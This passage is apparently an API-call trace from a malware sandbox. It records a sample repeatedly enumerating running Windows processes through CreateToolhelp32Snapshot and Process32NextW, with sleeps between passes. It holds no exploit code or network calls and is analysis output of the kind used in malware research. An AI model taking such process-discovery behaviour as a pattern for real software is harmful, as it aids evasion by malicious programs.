cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.062] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.148] CloseHandle (hObject=0xc4) returned 1 [0103.148] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0103.155] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.155] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.158] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.161] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.220] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.228] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.230] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 
[0103.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0103.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0103.328] CloseHandle (hObject=0xbc) returned 1 [0103.328] Sleep (dwMilliseconds=0x12c) [0103.671] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.677] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 